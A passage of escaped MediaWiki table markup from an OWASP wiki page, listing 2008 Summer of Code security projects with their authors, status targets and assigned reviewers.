| align=&amp;quot;CENTER&amp;quot; | [mailto:Omar.Sherin(at)infosec2.com Omar Sherin]&amp;lt;br&amp;gt;TBC &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Education Project|OWASP Education Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Martin Knobloch&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:sebastien.gioria@owasp.fr Sebastien Gioria]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/gioria Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:namn(at)bluemoon.com.vn Nam Nguyen]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:OWASP Internationalization|OWASP Internationalization Guidelines Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Juan Carlos Calderon &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:fabio.e.cerullo(at)aib.ie Fabio Cerullo]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Fabio.e.cerullo Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:rodrigo(at)rmarcos.com Rodrigo Marcos]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Rodrigo.marcos Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP .NET Project#OWASP .NET Project Leader|OWASP .NET Project Leader]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Mark Roxberry &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eoinkeary(at)gmail.com Eoin Keary]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:dennis.hurst(at)hp.com Dennis Hurst]&amp;lt;br&amp;gt;TBC&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Dinis Cruz&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Positive Security Project|OWASP Positive Security Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Eduardo Vianna de Camargo Neves &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:welias(at)conviso.com.br Wagner Elias]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ken(at)krvw.com Kenneth Wyk]&amp;lt;br&amp;gt;TBC&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Ruby on Rails Security Guide V2|OWASP Ruby on Rails Security Guide v2]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Heiko Webers &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:jons0022-at-unf.edu Steve Jones]&amp;lt;br&amp;gt; [https://www.owasp.org/index.php/OWASP_Summer_of_Code_2008_Projects_Authors_Status_Target_and_Reviewers_Steve_Jones_Background Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:jeff.cabaniss(at)gmail.com Jeff Cabaniss]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Securing WebGoat using ModSecurity Project|OWASP Securing WebGoat using ModSecurity]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Stephen Evans &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ivan.ristic(at)breach.com Ivan Ristic] &amp;amp; Breach Group&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:christian.folini(at)netnea.com Christian Folini]&amp;lt;br&amp;gt;[http://www.netnea.com/cms/?q=christian_folini Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot;|'''[[:Category:OWASP Source Code Review OWASP Projects Project|OWASP Source Code Review OWASP Projects]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | James Walden&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:afry(at)strongcrypto.biz Alexander Fry]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/alexanderfry Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:marco.m.morana(at)gmail.com Marco M. Morana]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Marco M Morana Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:OWASP Spanish|OWASP Spanish Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Juan Carlos Calderon &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:fabio.e.cerullo(at)aib.ie Fabio Cerullo]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Fabio.e.cerullo Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:rodrigo(at)rmarcos.com Rodrigo Marcos]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Rodrigo.marcos Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Testing Project|OWASP Testing Guide v3]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Matteo Meucci &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:namn@bluemoon.com.vn Nam Nguyen]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:KFuller@dmv.ca.gov Kevin Fuller]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Fuller Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed) &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; |&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! width=&amp;quot;400&amp;quot; height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | Application&lt;br /&gt;
! width=&amp;quot;120&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Author'''&lt;br /&gt;
! width=&amp;quot;60&amp;quot; align=&amp;quot;CENTER&amp;quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''1st&amp;lt;br&amp;gt;Reviewer'''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''2nd&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''3rd&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''4th&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''OWASP&amp;lt;br&amp;gt;Board&amp;lt;br&amp;gt;Reviewer&lt;br /&gt;
'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP ASDR Project|OWASP Application Security Desk Reference (ASDR)]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Leonardo Cavallari Militelli &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:williamtsmith(at)gmail.com William Smith]&amp;lt;br&amp;gt;[[OWASP SoC 2008 ASDR Reviewers#William Smith | Bio]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ken(at)krvw.com Kenneth Wyk]&amp;lt;br&amp;gt;[[OWASP SoC 2008 ASDR Reviewers#Kenneth R. van Wyk| Bio]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kcfredman(at)gmail.com Frederick Donovan]&amp;lt;br&amp;gt;[[OWASP SoC 2008 ASDR Reviewers#Frederick Donovan | Bio]]&amp;lt;br&amp;gt;  (Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:Darren.Challey(at)ge.com Darren W. Challey]&amp;lt;br&amp;gt;[[OWASP SoC 2008 ASDR Reviewers#Darren W. Challey | Bio]]&amp;lt;br&amp;gt;  (Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Jeff Williams&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== TOOLS PROJECTS ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! width=&amp;quot;600&amp;quot; height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | Application&lt;br /&gt;
! width=&amp;quot;220&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Author'''&lt;br /&gt;
! width=&amp;quot;60&amp;quot; align=&amp;quot;CENTER&amp;quot; | [[:Category:OWASP Project Assessment|'''Status Target''']]&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''1st&amp;lt;br&amp;gt;Reviewer'''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''2nd&amp;lt;br&amp;gt;Reviewer '''&lt;br /&gt;
! width=&amp;quot;108&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''OWASP&amp;lt;br&amp;gt;Board&amp;lt;br&amp;gt;Reviewer&lt;br /&gt;
'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:GTK plus GUI for w3af Project|GTK+ GUI for w3af project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Facundo Batista&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:andres.riancho(at)gmail.com Andres Riancho]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/ariancho Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ah(at)securenet(dot)de Achim Hoffmann]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Achim Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Access Control Rules Tester Project|OWASP Access Control Rules Tester]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Andrew Petukhov&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:caughron(at)gmail.com Mat Caughron]&amp;lt;br&amp;gt;[http://www.linkedin.com/pub/1/A84/998 Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:mg_chen(at)yahoo.com Min Chen]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/mgchen Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP AntiSamy Project .NET| OWASP AntiSamy .NET]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Arshan Dabirsiaghi&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&amp;lt;br&amp;gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:yiannis(at)owasp.org Yiannis Pavlosoglou]&amp;lt;br&amp;gt;(TBC)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Jeff Williams&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Application Security Tool Benchmarking Environment and Site Generator Refresh Project|OWASP Application Security Tool Benchmarking Environment and Site Generator refresh]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Dmitry Kozlov&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:mark.roxberry(at)owasp.org Mark Roxberry]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/roxberry Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:medelibero(at)gmail.com Mike de Libero]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Dinis Cruz&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Code Crawler|OWASP Code Crawler ]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Alessio Marziali &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:dinis.cruz(at)owasp.org Dinis Cruz]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Interceptor Project|OWASP Interceptor Project - 2008 Update]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Justin Derry&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ngreen16(at)yahoo.com Nathan Green]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Ngreen16 Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kisero(at)gmail.com Esteban Ribičić]&amp;lt;br&amp;gt;[http://docs.google.com/Doc?id=df9vbj96_120fzfj4kfk Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP JSP Testing Tool Project|OWASP UI Component Verification Project (a.k.a. OWASP JSP Testing Tool)]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Jason Li&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:markkerzner(at)gmail.com Mark Kerzner]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/markkerzner Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:fabricio.fujikawa(at)infoglobo.com.br Fabrício Fujikawa]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Live CD 2008 Project|OWASP Live CD 2008 Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Matt Tesauro&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:admin@wirefall.com Dustin Dykes]&amp;lt;br&amp;gt;[http://www.linkedin.com/pub/1/607/6b1 Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:jkpoots(at)rogers.com Kent Poots] &amp;lt;br&amp;gt; [http://www.linkedin.com/pub/5/25B/114 Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP OpenSign Server Project|OWASP Online code signing and integrity verification service for open source community (OpenSign Server)]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Phil Potisk and Richard Conway&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:pierre.parrend@insa-lyon.fr Pierre Parrend]&amp;lt;br&amp;gt;[http://www.rzo.free.fr Curriculum]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:a_campani@yahoo.fr Antonio Campanile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP OpenPGP Extensions for HTTP - Enigform and mod openpgp|OWASP OpenPGP Extensions for HTTP - Enigform and mod_openpgp]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Arturo 'Buanzo' Busleiman&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:mark.roxberry(at)owasp.org Mark Roxberry]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/roxberry Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:dinis.cruz(at)owasp.org Dinis Cruz]&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Orizon Project|OWASP Orizon Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Paolo Perego&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Quality&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:eoinkeary@gmail.com Eoin Keary]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:seba@deleersnyder.eu Sebastien Deleersnyder]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:dinis.cruz@owasp.org Dinis Cruz]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Python Static Analysis Project|OWASP Python Static Analysis]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Georgy Klimov&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:namn@bluemoon.com.vn Nam Nguyen]&amp;lt;br&amp;gt;[[OWASP Summer of Code 2008 Projects Authors Status Target and Reviewers Nguyen Curriculum|Curriculum]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:diepvien00thayh@gmail.com P.Q.Huy]&amp;lt;br&amp;gt;(Confirmed) &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Skavenger Project|OWASP Skavenger]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:mro(at)securenet.de Matthias Rohr]&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Rogan Dawes&amp;lt;br&amp;gt;Email address?&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ah(at)securenet(dot)de Achim Hoffmann]&amp;lt;br&amp;gt;[https://www.owasp.org/index.php/User:Achim Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Sqlibench Project|OWASP SQL Injector Benchmarking Project (SQLiBENCH)]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:urgunb@hotmail.com Bedirhan Urgun]&amp;lt;br&amp;gt;[mailto:mesut@h-labs.org Mesut Timur]&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ferruh@mavituna.com Ferruh Mavituna]&amp;lt;br/&amp;gt; [[Project Information:Sqlibench:Ferruh|background info]]&amp;lt;br/&amp;gt;(Confirmed) &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:kfuller@dmv.ca.gov Kevin Fuller] &amp;lt;br/&amp;gt;[[Project Information:Sqlibench:Kevin|background info]]&amp;lt;br/&amp;gt;(Confirmed) &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP Teachable Static Analysis Workbench Project|OWASP Teachable Static Analysis Workbench]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:ddk(at)cs.msu.su Dmitry Kozlov]&amp;lt;br&amp;gt;Igor Konnov&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:afry(at)strongcrypto.biz Alex Fry]&amp;lt;br&amp;gt;TBC&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | &lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;18&amp;quot; bgcolor=&amp;quot;#FFFFFF&amp;quot; align=&amp;quot;CENTER&amp;quot; valign=&amp;quot;MIDDLE&amp;quot; | '''[[:Category:OWASP WeBekci Project|OWASP WeBekci Project]]'''&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:bunyamin@owasp.org Bunyamin Demir]&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Beta&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:afry(at)strongcrypto.biz Alexander Fry]&amp;lt;br&amp;gt;[http://www.linkedin.com/in/alexanderfry Profile]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | [mailto:stefano.dipaola(at)wisec.it Stefano Di Paola]&amp;lt;br/&amp;gt;[[User:Wisec|Profile]]&amp;lt;br&amp;gt;(Confirmed)&lt;br /&gt;
| align=&amp;quot;CENTER&amp;quot; | Not applicable&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== DESIGN/CORPORATE PROJECTS ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
